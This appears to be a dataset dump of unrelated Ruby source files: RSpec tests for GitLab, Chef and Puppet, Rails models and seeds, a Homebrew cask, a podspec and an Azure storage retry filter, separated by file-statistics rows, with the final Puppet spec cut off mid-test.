let(:project) { create(:project) }
after do
project.reset_pushes_since_gc
end
context 'without any pushes' do
it 'returns 0' do
expect(project.pushes_since_gc).to eq(0)
end
end
context 'with a number of pushes' do
it 'returns the number of pushes' do
3.times { project.increment_pushes_since_gc }
expect(project.pushes_since_gc).to eq(3)
end
end
end
describe '#increment_pushes_since_gc' do
let(:project) { create(:project) }
after do
project.reset_pushes_since_gc
end
it 'increments the number of pushes since the last GC' do
3.times { project.increment_pushes_since_gc }
expect(project.pushes_since_gc).to eq(3)
end
end
describe '#reset_pushes_since_gc' do
let(:project) { create(:project) }
after do
project.reset_pushes_since_gc
end
it 'resets the number of pushes since the last GC' do
3.times { project.increment_pushes_since_gc }
project.reset_pushes_since_gc
expect(project.pushes_since_gc).to eq(0)
end
end
describe '#environments_for' do
let(:project) { create(:project) }
let(:environment) { create(:environment, project: project) }
context 'tagged deployment' do
before do
create(:deployment, environment: environment, ref: '1.0', tag: true, sha: project.commit.id)
end
it 'returns environment when with_tags is set' do
expect(project.environments_for('master', commit: project.commit, with_tags: true))
.to contain_exactly(environment)
end
it 'does not return environment when no with_tags is set' do
expect(project.environments_for('master', commit: project.commit))
.to be_empty
end
it 'does not return environment when commit is not part of deployment' do
expect(project.environments_for('master', commit: project.commit('feature')))
.to be_empty
end
end
context 'branch deployment' do
before do
create(:deployment, environment: environment, ref: 'master', sha: project.commit.id)
end
it 'returns environment when ref is set' do
expect(project.environments_for('master', commit: project.commit))
.to contain_exactly(environment)
end
it 'does not environment when ref is different' do
expect(project.environments_for('feature', commit: project.commit))
.to be_empty
end
it 'does not return environment when commit is not part of deployment' do
expect(project.environments_for('master', commit: project.commit('feature')))
.to be_empty
end
it 'returns environment when commit constraint is not set' do
expect(project.environments_for('master'))
.to contain_exactly(environment)
end
end
end
describe '#environments_recently_updated_on_branch' do
let(:project) { create(:project) }
let(:environment) { create(:environment, project: project) }
context 'when last deployment to environment is the most recent one' do
before do
create(:deployment, environment: environment, ref: 'feature')
end
it 'finds recently updated environment' do
expect(project.environments_recently_updated_on_branch('feature'))
.to contain_exactly(environment)
end
end
context 'when last deployment to environment is not the most recent' do
before do
create(:deployment, environment: environment, ref: 'feature')
create(:deployment, environment: environment, ref: 'master')
end
it 'does not find environment' do
expect(project.environments_recently_updated_on_branch('feature'))
.to be_empty
end
end
context 'when there are two environments that deploy to the same branch' do
let(:second_environment) { create(:environment, project: project) }
before do
create(:deployment, environment: environment, ref: 'feature')
create(:deployment, environment: second_environment, ref: 'feature')
end
it 'finds both environments' do
expect(project.environments_recently_updated_on_branch('feature'))
.to contain_exactly(environment, second_environment)
end
end
end
describe '#deployment_variables' do
context 'when project has no deployment service' do
let(:project) { create(:empty_project) }
it 'returns an empty array' do
expect(project.deployment_variables).to eq []
end
end
context 'when project has a deployment service' do
let(:project) { create(:kubernetes_project) }
it 'returns variables from this service' do
expect(project.deployment_variables).to include(
{ key: 'KUBE_TOKEN', value: project.kubernetes_service.token, public: false }
)
end
end
end
describe '#update_project_statistics' do
let(:project) { create(:empty_project) }
it "is called after creation" do
expect(project.statistics).to be_a ProjectStatistics
expect(project.statistics).to be_persisted
end
it "copies the namespace_id" do
expect(project.statistics.namespace_id).to eq project.namespace_id
end
it "updates the namespace_id when changed" do
namespace = create(:namespace)
project.update(namespace: namespace)
expect(project.statistics.namespace_id).to eq namespace.id
end
end
def enable_lfs
allow(Gitlab.config.lfs).to receive(:enabled).and_return(true)
end
end
| 32.802945 | 123 | 0.680994 |
ff8c544d1c5e984fd4b99855c06bdc848627d48b | 1,754 | class TaxonNameRelationship::Iczn::Invalidating::Homonym::Secondary::Secondary1961 < TaxonNameRelationship::Iczn::Invalidating::Homonym::Secondary
NOMEN_URI='http://purl.obolibrary.org/obo/NOMEN_0000292'.freeze
soft_validate(:sv_year_of_description, set: :specific_relationship, has_fix: false)
soft_validate(:sv_source_not_selected, set: :specific_relationship, has_fix: false)
soft_validate(:sv_source_after_1960, set: :specific_relationship, has_fix: false)
def self.disjoint_taxon_name_relationships
self.parent.disjoint_taxon_name_relationships +
[TaxonNameRelationship::Iczn::Invalidating::Homonym::Secondary.to_s]
end
def object_status
'senior secondary homonym'
end
def subject_status
'secondary homonym replaced before 1961'
end
def self.assignment_method
# bus.set_as_iczn_secondary_homonym_before_1961_of(aus)
:iczn_set_as_secondary_homonym_before_1961_of
end
def self.inverse_assignment_method
# aus.iczn_secondary_homonym_before_1961 = bus
:iczn_secondary_homonym_before_1961
end
def sv_year_of_description
s = subject_taxon_name
soft_validations.add(:type, "#{s.cached_html_name_and_author_year} was not described before 1961") if s.year_of_publication && s.year_of_publication > 1960
end
def sv_source_not_selected
soft_validations.add(:base, 'The original publication is not selected') unless source
end
def sv_source_after_1960
if self.source
s = subject_taxon_name
soft_validations.add(:base, "#{s.cached_html_name_and_author_year} should not be treated as a homonym established before 1961") if self.source.year > 1960
end
end
def sv_same_genus
true
end
def sv_specific_relationship
true
end
end
| 30.241379 | 160 | 0.782212 |
1a04f60eca1e0a9b795890dea9c3d75ffc7aa69d | 556 | $small_hash = {
[[770637937]] => 18,
[442227972, :E2WngMu6vy] => 5,
:jaWa => 0,
:E0R5HN7hX => 14,
700648627 => 6,
639030613 => 12,
348421750 => 16,
[[:qpMHyZacFmMU]] => 8,
:SlBkyplxcZ => 17,
144371495 => 1,
[596739929] => 9,
385412024 => 4,
[673910393] => 19,
471761289 => 13,
[:E7, 949213064] => 10,
:yWcqadXwyg => 3,
[[[[[:rzW63YCk8, 379991405]]]], 911063042] => 7,
344267835 => 15,
:yJjeRw => 11,
[[[:gIVP], 56874545], [[:d2G1ZCONKq, [884339273, :PA4vYV6dlOv]], [[[[:kI1pIzVGbfuJ], 701032940]], :u7H5]]] => 2,
}
| 23.166667 | 114 | 0.548561 |
1dc2b97ff98cc497f1003a7c553058a4dfe6ca22 | 804 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
User.delete_all
admin = User.create(email: "[email protected]", password: 'password')
admin.add_role :admin
REDIS_ADS.flushdb
REDIS_IMPR.flushdb
REDIS_KW.flushdb
Click.delete_all
Ad.delete_all
10.times do |i|
Ad.create(keywords: "keyword#{rand((1..5))}", cpc: rand(1..10), budget: rand(20..50),
title: "title#{i}", body: "body#{i}", link: "http://website#{i}.com")
end
10.times do |i|
REDIS_KW.incrby("keyword#{i}", i)
end
| 28.714286 | 111 | 0.699005 |
08ddd2b100445f064b3d9de6260441a6ec4d49e7 | 458 | class Teacher < ActiveRecord::Base
before_save { self.email = email.downcase }
VALID_EMAIL_REGEX = /\A[\w+\-.]+@[a-z\d\-.]+\.[a-z]+\z/i
validates :name, presence: true, length: { maximum: 50 }
validates :email, presence: true, length: { maximum: 250},
format: { with: VALID_EMAIL_REGEX },
uniqueness: { case_sensitive: false }
has_secure_password
validates :password, length: { minimum: 6 }
has_many :classrooms
end
| 32.714286 | 61 | 0.646288 |
6116cf641b24f247be2a41d374e1aa4b1016e325 | 537 | cask 'radarr' do
version '0.2.0.654'
sha256 'c0aa3875ee49383e06b34abcfb86b5d1bce746970e0a20dd396d5a6c076b77d4'
# github.com/Radarr/Radarr was verified as official when first introduced to the cask
url "https://github.com/Radarr/Radarr/releases/download/v#{version}/Radarr.develop.#{version}.osx-app.zip"
appcast 'https://github.com/Radarr/Radarr/releases.atom',
checkpoint: 'd86e5406dd44ed06fee747cf5d3c8468023befbd7ba9e8fe15874a355ea0f624'
name 'Radarr'
homepage 'https://radarr.video/'
app 'Radarr.app'
end
| 38.357143 | 108 | 0.772812 |
f8a37d952930dffff3a99665ecf35ee4bfea76c4 | 590 | class <%= migration_class_name %> < ActiveRecord::Migration<%= migration_version %>
def change
create_table :<%= job_log_table_name %> do |t|
t.string :sidekiq_jid, :null => false
t.string :status
t.string :item_type
t.text :args, limit: 4294967295
t.boolean :retry, null: false, default: false
t.string :queue
t.text :backtrace, limit: 4294967295
t.datetime :finished_at
t.timestamps
end
add_index :<%= job_log_table_name %>, :sidekiq_jid, :unique => true
add_index :<%= job_log_table_name %>, :updated_at
end
end
| 31.052632 | 83 | 0.652542 |
184eec4faae473f0f16b9dba82b3facf5701f94f | 1,485 |
Pod::Spec.new do |s|
s.name = 'NJDYPlayer'
s.version = '1.0.0'
s.summary = 'NJDYPlayer, NJDYPlayer'
s.homepage = 'https://github.com/njhu/NJDYPlayer'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'njhu' => '[email protected]' }
s.social_media_url = 'http://weibo.com/njhu'
#s.source = { :git => 'https://github.com/njhu/NJDYPlayer.git', :tag => s.version.to_s }
s.source = { :git => 'https://github.com/njhu/NJDYPlayer.git', :branch =>'master' }
s.description = <<-DESC
NJDYPlayer, NJDYPlayer, NJDYPlayer, NJDYPlayer, NJDYPlayer, NJDYPlayer, NJDYPlayer
DESC
s.ios.deployment_target = '10.3'
s.requires_arc = true
s.static_framework = true
# 调试开发打开注释
s.source_files = 'NJDYPlayer/Classes/**/*'
# 上线打开注释
#二级目录
#s.subspec 'Controller' do |ss|
# ss.source_files = 'NJDYPlayer/Classes/Controller/*.{swift,xib}'
#end
#
#s.subspec 'Model' do |ss|
# ss.source_files = 'NJDYPlayer/Classes/Model/*.{swift}'
#end
#
#s.subspec 'View' do |ss|
# ss.source_files = 'NJDYPlayer/Classes/View/*.{swift,xib}'
#end
#
#s.subspec 'ViewModel' do |ss|
# ss.source_files = 'NJDYPlayer/Classes/ViewModel/*.{swift}'
#end
#
#s.subspec 'Other' do |ss|
# ss.source_files = 'NJDYPlayer/Classes/Other/*.{swift}'
#end
#二级目录
s.resource_bundles = {
'NJDYPlayer' => ['NJDYPlayer/Assets/**/*.{plist,webp,png,xcassets}']
}
#s.dependency 'NJKit'
s.frameworks = 'UIKit'
s.dependency 'NJIJKPlayer'
end
| 24.75 | 98 | 0.63569 |
ace2ad24e3c562b76446e1eec0be79a4064771b4 | 8,832 | #
# Author:: AJ Christensen (<[email protected]>)
# Copyright:: Copyright (c) 2008 Opscode, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'spec_helper'
describe Chef::Provider::Service::Invokercd, "load_current_resource" do
before(:each) do
@node = Chef::Node.new
@node.automatic_attrs[:command] = {:ps => "ps -ef"}
@events = Chef::EventDispatch::Dispatcher.new
@run_context = Chef::RunContext.new(@node, {}, @events)
@new_resource = Chef::Resource::Service.new("chef")
@current_resource = Chef::Resource::Service.new("chef")
@provider = Chef::Provider::Service::Invokercd.new(@new_resource, @run_context)
Chef::Resource::Service.stub!(:new).and_return(@current_resource)
@stdout = StringIO.new(<<-PS)
aj 7842 5057 0 21:26 pts/2 00:00:06 vi init.rb
aj 7903 5016 0 21:26 pts/5 00:00:00 /bin/bash
aj 8119 6041 0 21:34 pts/3 00:00:03 vi init_service_spec.rb
PS
@status = mock("Status", :exitstatus => 0, :stdout => @stdout)
@provider.stub!(:shell_out!).and_return(@status)
end
it "should create a current resource with the name of the new resource" do
@provider.load_current_resource
@provider.current_resource.should equal(@current_resource)
end
it "should set the current resources service name to the new resources service name" do
@provider.load_current_resource
@current_resource.service_name.should == 'chef'
end
describe "when the service supports status" do
before do
@new_resource.supports({:status => true})
end
it "should run '/usr/sbin/invoke-rc.d service_name status'" do
@provider.should_receive(:shell_out).with("/usr/sbin/invoke-rc.d #{@current_resource.service_name} status").and_return(@status)
@provider.load_current_resource
end
it "should set running to true if the the status command returns 0" do
@provider.stub!(:shell_out).with("/usr/sbin/invoke-rc.d #{@current_resource.service_name} status").and_return(@status)
@provider.load_current_resource
@current_resource.running.should be_true
end
it "should set running to false if the status command returns anything except 0" do
@status.stub!(:exitstatus).and_return(1)
@provider.stub!(:shell_out).with("/usr/sbin/invoke-rc.d #{@current_resource.service_name} status").and_return(@status)
@provider.load_current_resource
@current_resource.running.should be_false
end
it "should set running to false if the status command raises" do
@provider.stub!(:shell_out).with("/usr/sbin/invoke-rc.d #{@current_resource.service_name} status").and_raise(Mixlib::ShellOut::ShellCommandFailed)
@provider.load_current_resource
@current_resource.running.should be_false
end
end
describe "when a status command has been specified" do
before do
@new_resource.stub!(:status_command).and_return("/usr/sbin/invoke-rc.d chefhasmonkeypants status")
end
it "should run the services status command if one has been specified" do
@provider.should_receive(:shell_out).with("/usr/sbin/invoke-rc.d chefhasmonkeypants status").and_return(@status)
@provider.load_current_resource
end
end
describe "when the node has not specified a ps command" do
it "should raise error if the node has a nil ps attribute and no other means to get status" do
@node.automatic_attrs[:command] = {:ps => nil}
@provider.action = :start
@provider.define_resource_requirements
lambda { @provider.process_resource_requirements }.should raise_error(Chef::Exceptions::Service)
end
it "should raise error if the node has an empty ps attribute and no other means to get status" do
@node.automatic_attrs[:command] = {:ps => ""}
@provider.action = :start
@provider.define_resource_requirements
lambda { @provider.process_resource_requirements }.should raise_error(Chef::Exceptions::Service)
end
end
describe "when we have a 'ps' attribute" do
it "should shell_out! the node's ps command" do
@status = mock("Status", :exitstatus => 0, :stdout => @stdout)
@provider.should_receive(:shell_out!).with(@node[:command][:ps]).and_return(@status)
@provider.load_current_resource
end
it "should set running to true if the regex matches the output" do
@stdout = StringIO.new(<<-RUNNING_PS)
aj 7842 5057 0 21:26 pts/2 00:00:06 chef
aj 7842 5057 0 21:26 pts/2 00:00:06 poos
RUNNING_PS
@status = mock("Status", :exitstatus => 0, :stdout => @stdout)
@provider.should_receive(:shell_out!).and_return(@status)
@provider.load_current_resource
@current_resource.running.should be_true
end
it "should set running to false if the regex doesn't match" do
@status = mock("Status", :exitstatus => 0, :stdout => @stdout)
@provider.should_receive(:shell_out!).and_return(@status)
@provider.load_current_resource
@current_resource.running.should be_false
end
it "should raise an exception if ps fails" do
@provider.stub!(:shell_out!).and_raise(Mixlib::ShellOut::ShellCommandFailed)
@provider.action = :start
@provider.load_current_resource
@provider.define_resource_requirements
lambda { @provider.process_resource_requirements }.should raise_error(Chef::Exceptions::Service)
end
end
it "should return the current resource" do
@provider.load_current_resource.should eql(@current_resource)
end
describe "when starting the service" do
it "should call the start command if one is specified" do
@new_resource.start_command("/usr/sbin/invoke-rc.d chef startyousillysally")
@provider.should_receive(:shell_out!).with("/usr/sbin/invoke-rc.d chef startyousillysally")
@provider.start_service()
end
it "should call '/usr/sbin/invoke-rc.d service_name start' if no start command is specified" do
@provider.should_receive(:shell_out!).with("/usr/sbin/invoke-rc.d #{@new_resource.service_name} start")
@provider.start_service()
end
end
describe Chef::Provider::Service::Invokercd, "stop_service" do
it "should call the stop command if one is specified" do
@new_resource.stop_command("/usr/sbin/invoke-rc.d chef itoldyoutostop")
@provider.should_receive(:shell_out!).with("/usr/sbin/invoke-rc.d chef itoldyoutostop")
@provider.stop_service()
end
it "should call '/usr/sbin/invoke-rc.d service_name stop' if no stop command is specified" do
@provider.should_receive(:shell_out!).with("/usr/sbin/invoke-rc.d #{@new_resource.service_name} stop")
@provider.stop_service()
end
end
describe "when restarting a service" do
it "should call 'restart' on the service_name if the resource supports it" do
@new_resource.supports({:restart => true})
@provider.should_receive(:shell_out!).with("/usr/sbin/invoke-rc.d #{@new_resource.service_name} restart")
@provider.restart_service()
end
it "should call the restart_command if one has been specified" do
@new_resource.restart_command("/usr/sbin/invoke-rc.d chef restartinafire")
@provider.should_receive(:shell_out!).with("/usr/sbin/invoke-rc.d #{@new_resource.service_name} restartinafire")
@provider.restart_service()
end
it "should just call stop, then start when the resource doesn't support restart and no restart_command is specified" do
@provider.should_receive(:stop_service)
@provider.should_receive(:sleep).with(1)
@provider.should_receive(:start_service)
@provider.restart_service()
end
end
describe "when reloading a service" do
it "should call 'reload' on the service if it supports it" do
@new_resource.supports({:reload => true})
@provider.should_receive(:shell_out!).with("/usr/sbin/invoke-rc.d chef reload")
@provider.reload_service()
end
it "should should run the user specified reload command if one is specified and the service doesn't support reload" do
@new_resource.reload_command("/usr/sbin/invoke-rc.d chef lollerpants")
@provider.should_receive(:shell_out!).with("/usr/sbin/invoke-rc.d chef lollerpants")
@provider.reload_service()
end
end
end
| 41.464789 | 152 | 0.710145 |
6af295243e559d4b71127da6367261d3ce277e20 | 3,100 | # frozen_string_literal: true
#-------------------------------------------------------------------------
# # Copyright (c) Microsoft and contributors. All rights reserved.
#
# The MIT License(MIT)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#--------------------------------------------------------------------------
require "azure/core"
require "azure/core/http/retry_policy"
module Azure::Storage::Common::Core::Filter
class ExponentialRetryPolicyFilter < RetryPolicyFilter
def initialize(retry_count = nil, min_retry_interval = nil, max_retry_interval = nil)
@retry_count = retry_count || ExponentialRetryPolicyFilter::DEFAULT_RETRY_COUNT
@min_retry_interval = min_retry_interval || ExponentialRetryPolicyFilter::DEFAULT_MIN_RETRY_INTERVAL
@max_retry_interval = max_retry_interval || ExponentialRetryPolicyFilter::DEFAULT_MAX_RETRY_INTERVAL
super @retry_count, @min_retry_interval
end
attr_reader :min_retry_interval,
:max_retry_interval
DEFAULT_RETRY_COUNT = 3
DEFAULT_MIN_RETRY_INTERVAL = 10
DEFAULT_MAX_RETRY_INTERVAL = 90
# Overrides the base class implementation of call to determine
# how the HTTP request should continue retrying
#
# retry_data - Hash. Stores stateful retry data
#
# The retry_data is a Hash which can be used to store
# stateful data about the request execution context (such as an
# incrementing counter, timestamp, etc). The retry_data object
# will be the same instance throughout the lifetime of the request
def apply_retry_policy(retry_data)
# Adjust retry count
retry_data[:count] = retry_data[:count] === nil ? 1 : retry_data[:count] + 1
# Adjust retry interval
increment_delta = (@max_retry_interval - @min_retry_interval).fdiv(2**(@retry_count - 1)) * (2**(retry_data[:count] - 1));
retry_data[:interval] = retry_data[:interval] === nil ? @min_retry_interval : [@min_retry_interval + increment_delta, @max_retry_interval].min;
end
end
end
| 47.692308 | 150 | 0.700968 |
bbe3d4d044abd692ef433dd0f58534bf4e806253 | 3,778 | require 'rspec'
require_relative './renderer.rb'
describe 'Renderer' do
describe '#render' do
subject(:renderer) { Renderer.new }
let(:binary_update_1) do
update = double('BinaryUpdate')
allow(update).to receive(:old_version) { '1.1.0' }
allow(update).to receive(:new_version) { '1.3.0' }
update
end
let(:binary_update_2) do
update = double('BinaryUpdate')
allow(update).to receive(:old_version) { '1.2.0' }
allow(update).to receive(:new_version) { '1.4.0' }
update
end
let(:binary_updates) do
updates = double('BinaryUpdates')
allow(updates).to receive(:each).and_yield('binary-1', binary_update_1).and_yield('binary-2', binary_update_2)
updates
end
let(:task_updates) do
updates = double('TaskUpdates')
allow(updates).to receive(:new_tasks).and_return(['new-task'])
allow(updates).to receive(:deleted_tasks).and_return(['deleted-task'])
allow(updates).to receive(:updated_tasks).and_return(['updated-task'])
updates
end
it 'includes a section header for Notices' do
rendered_output = renderer.render(binary_updates: binary_updates, task_updates: task_updates)
expect(rendered_output).to include ("## Notices")
end
it 'includes a section header for Notices, as well as sub-headers for New and Updated Tasks' do
rendered_output = renderer.render(binary_updates: binary_updates, task_updates: task_updates)
expect(rendered_output).to include (
<<-NOTICES
## Notices
### :point_right: New Tasks :point_left:
-**`new-task`**
### :point_right: Updated Tasks :point_left:
-**`updated-task`**
### :point_right: Deleted Tasks :point_left:
-**`deleted-task`**
NOTICES
)
end
it 'inlcudes a section header for Binary Updates' do
rendered_output = renderer.render(binary_updates: binary_updates, task_updates: task_updates)
expect(rendered_output).to include ("## Binary Updates\n")
end
describe 'Binary table' do
it 'includes a header' do
rendered_output = renderer.render(binary_updates: binary_updates, task_updates: task_updates)
expect(rendered_output).to include(
<<-HEADER
| Binary | Old Version | New Version |
| ------- | ----------- | ----------- |
HEADER
)
end
it 'places the table header immediately after the section header' do
rendered_output = renderer.render(binary_updates: binary_updates, task_updates: task_updates)
expect(rendered_output).to include ("## Binary Updates\n| Binary | Old Version | New Version |")
end
it 'shows the binary name, old version, and new version for each binary' do
rendered_output = renderer.render(binary_updates: binary_updates, task_updates: task_updates)
expect(rendered_output).to include('| binary-1 | 1.1.0 | 1.3.0 |')
expect(rendered_output).to include('| binary-2 | 1.2.0 | 1.4.0 |')
end
context 'when some versions are nil' do
let(:binary_update_1) do
update = double('BinaryUpdate')
allow(update).to receive(:old_version) { '1.1.0' }
allow(update).to receive(:new_version) { nil }
update
end
let(:binary_update_2) do
update = double('BinaryUpdate')
allow(update).to receive(:old_version) { nil }
allow(update).to receive(:new_version) { '1.4.0' }
update
end
it 'renders them as empty strings' do
rendered_output = renderer.render(binary_updates: binary_updates, task_updates: task_updates)
expect(rendered_output).to include('| binary-1 | 1.1.0 | |')
expect(rendered_output).to include('| binary-2 | | 1.4.0 |')
end
end
end
end
end
| 34.345455 | 116 | 0.650873 |
e256d5858452ab4cf418cd42b6cb3739518b23f8 | 200 | require 'spec_helper'
describe TvTonight do
it 'has a version number' do
expect(TvTonight::VERSION).not_to be nil
end
it 'does something useful' do
expect(false).to eq(true)
end
end
| 16.666667 | 44 | 0.71 |
01cf78beec0e0f3b9e1113cfc4b1b48c588d2f1a | 12,050 | require 'spec_helper'
describe 'apache::mod::passenger', :type => :class do
let :pre_condition do
'include apache'
end
context "on a Debian OS" do
let :facts do
{
:osfamily => 'Debian',
:operatingsystemrelease => '6',
:kernel => 'Linux',
:concat_basedir => '/dne',
:lsbdistcodename => 'squeeze',
:operatingsystem => 'Debian',
:id => 'root',
:kernel => 'Linux',
:path => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
:is_pe => false,
}
end
it { is_expected.to contain_class("apache::params") }
it { is_expected.to contain_apache__mod('zpassenger') }
it { is_expected.to contain_package("libapache2-mod-passenger") }
it { is_expected.to contain_file('zpassenger.load').with({
'path' => '/etc/apache2/mods-available/zpassenger.load',
}) }
it { is_expected.to contain_file('passenger.conf').with({
'path' => '/etc/apache2/mods-available/passenger.conf',
}) }
it { is_expected.to contain_file('passenger_package.conf').with_ensure('absent') }
describe "with passenger_root => '/usr/lib/example'" do
let :params do
{ :passenger_root => '/usr/lib/example' }
end
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRoot "/usr/lib/example"}) }
end
describe "with passenger_ruby => /usr/lib/example/ruby" do
let :params do
{ :passenger_ruby => '/usr/lib/example/ruby' }
end
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRuby "/usr/lib/example/ruby"}) }
end
describe "with passenger_default_ruby => /usr/lib/example/ruby1.9.3" do
let :params do
{ :passenger_ruby => '/usr/lib/example/ruby1.9.3' }
end
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRuby "/usr/lib/example/ruby1.9.3"}) }
end
describe "with passenger_high_performance => on" do
let :params do
{ :passenger_high_performance => 'on' }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerHighPerformance on$/) }
end
describe "with passenger_pool_idle_time => 1200" do
let :params do
{ :passenger_pool_idle_time => 1200 }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerPoolIdleTime 1200$/) }
end
describe "with passenger_max_requests => 20" do
let :params do
{ :passenger_max_requests => 20 }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerMaxRequests 20$/) }
end
describe "with passenger_stat_throttle_rate => 10" do
let :params do
{ :passenger_stat_throttle_rate => 10 }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerStatThrottleRate 10$/) }
end
describe "with passenger_max_pool_size => 16" do
let :params do
{ :passenger_max_pool_size => 16 }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerMaxPoolSize 16$/) }
end
describe "with rack_autodetect => on" do
let :params do
{ :rack_autodetect => 'on' }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ RackAutoDetect on$/) }
end
describe "with rails_autodetect => on" do
let :params do
{ :rails_autodetect => 'on' }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ RailsAutoDetect on$/) }
end
describe "with passenger_use_global_queue => on" do
let :params do
{ :passenger_use_global_queue => 'on' }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerUseGlobalQueue on$/) }
end
describe "with passenger_app_env => 'foo'" do
let :params do
{ :passenger_app_env => 'foo' }
end
it { is_expected.to contain_file('passenger.conf').with_content(/^ PassengerAppEnv foo$/) }
end
describe "with mod_path => '/usr/lib/foo/mod_foo.so'" do
let :params do
{ :mod_path => '/usr/lib/foo/mod_foo.so' }
end
it { is_expected.to contain_file('zpassenger.load').with_content(/^LoadModule passenger_module \/usr\/lib\/foo\/mod_foo\.so$/) }
end
describe "with mod_lib_path => '/usr/lib/foo'" do
let :params do
{ :mod_lib_path => '/usr/lib/foo' }
end
it { is_expected.to contain_file('zpassenger.load').with_content(/^LoadModule passenger_module \/usr\/lib\/foo\/mod_passenger\.so$/) }
end
describe "with mod_lib => 'mod_foo.so'" do
let :params do
{ :mod_lib => 'mod_foo.so' }
end
it { is_expected.to contain_file('zpassenger.load').with_content(/^LoadModule passenger_module \/usr\/lib\/apache2\/modules\/mod_foo\.so$/) }
end
describe "with mod_id => 'mod_foo'" do
let :params do
{ :mod_id => 'mod_foo' }
end
it { is_expected.to contain_file('zpassenger.load').with_content(/^LoadModule mod_foo \/usr\/lib\/apache2\/modules\/mod_passenger\.so$/) }
end
context "with Ubuntu 12.04 defaults" do
let :facts do
{
:osfamily => 'Debian',
:operatingsystemrelease => '12.04',
:kernel => 'Linux',
:operatingsystem => 'Ubuntu',
:lsbdistrelease => '12.04',
:concat_basedir => '/dne',
:id => 'root',
:path => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
:is_pe => false,
}
end
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRoot "/usr"}) }
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRuby "/usr/bin/ruby"}) }
it { is_expected.to contain_file('passenger.conf').without_content(/PassengerDefaultRuby/) }
end
context "with Ubuntu 14.04 defaults" do
let :facts do
{
:osfamily => 'Debian',
:operatingsystemrelease => '14.04',
:operatingsystem => 'Ubuntu',
:kernel => 'Linux',
:lsbdistrelease => '14.04',
:concat_basedir => '/dne',
:id => 'root',
:path => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
:is_pe => false,
}
end
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRoot "/usr/lib/ruby/vendor_ruby/phusion_passenger/locations.ini"}) }
it { is_expected.to contain_file('passenger.conf').without_content(/PassengerRuby/) }
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerDefaultRuby "/usr/bin/ruby"}) }
end
context "with Debian 7 defaults" do
let :facts do
{
:osfamily => 'Debian',
:operatingsystemrelease => '7.3',
:operatingsystem => 'Debian',
:kernel => 'Linux',
:lsbdistcodename => 'wheezy',
:concat_basedir => '/dne',
:id => 'root',
:path => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
:is_pe => false,
}
end
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRoot "/usr"}) }
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRuby "/usr/bin/ruby"}) }
it { is_expected.to contain_file('passenger.conf').without_content(/PassengerDefaultRuby/) }
end
context "with Debian 8 defaults" do
let :facts do
{
:osfamily => 'Debian',
:operatingsystemrelease => '8.0',
:operatingsystem => 'Debian',
:kernel => 'Linux',
:lsbdistcodename => 'jessie',
:concat_basedir => '/dne',
:id => 'root',
:path => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
:is_pe => false,
}
end
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerRoot "/usr/lib/ruby/vendor_ruby/phusion_passenger/locations.ini"}) }
it { is_expected.to contain_file('passenger.conf').without_content(/PassengerRuby/) }
it { is_expected.to contain_file('passenger.conf').with_content(%r{PassengerDefaultRuby "/usr/bin/ruby"}) }
end
end
context "on a RedHat OS" do
let :facts do
{
:osfamily => 'RedHat',
:operatingsystemrelease => '6',
:concat_basedir => '/dne',
:operatingsystem => 'RedHat',
:id => 'root',
:kernel => 'Linux',
:path => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
:is_pe => false,
}
end
it { is_expected.to contain_class("apache::params") }
it { is_expected.to contain_apache__mod('zpassenger') }
it { is_expected.to contain_package("mod_passenger") }
it { is_expected.to contain_file('passenger_package.conf').with({
